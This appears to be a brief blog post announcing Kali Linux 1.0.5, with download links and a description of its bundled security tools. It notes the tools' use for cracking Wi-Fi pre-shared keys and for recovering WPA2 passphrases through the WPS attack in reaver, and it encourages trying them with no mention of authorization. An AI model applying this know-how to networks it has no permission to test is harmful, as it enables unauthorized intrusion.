There is a new Linux distribution that has taken over from Backtrack. This is Kali, a distribution based upon the Debian distro. This uses the Gnome fallback desktop component of the Gnome 3 desktop and offers something that was lacking from the Backtrack distribution, a networking icon for changing your settings. All of the familiar network security testing utilities are there, whatweb is a good one. And the ability to test WIFI networks and see if you can crack the PSK that the user has set on the network to secure it. I have been told by another user of this distribution that they have managed to break WPA2 networks using the utilities supplied with this distribution; so I recommend downloading this and trying this out.
Download the 64 bit ISO here: http://cdimage.kali.org/kali-images/kali-1.0.5/kali-linux-1.0.5-amd64.iso.
There is also a torrent, get this here: http://cdimage.kali.org/kali-images/kali-1.0.5/kali-linux-1.0.5-amd64.torrent.
And a 32bit ISO for those with ancient computers: http://cdimage.kali.org/kali-images/kali-1.0.5/kali-linux-1.0.5-i386.iso.
Here I am using the reaver command. This allows someone to compromise the WPS Protected Setup feature of a wireless router and get the WPA2 passphrase with much less effort than cracking the WPA2 passphrase with brute force. This output is just an example though.
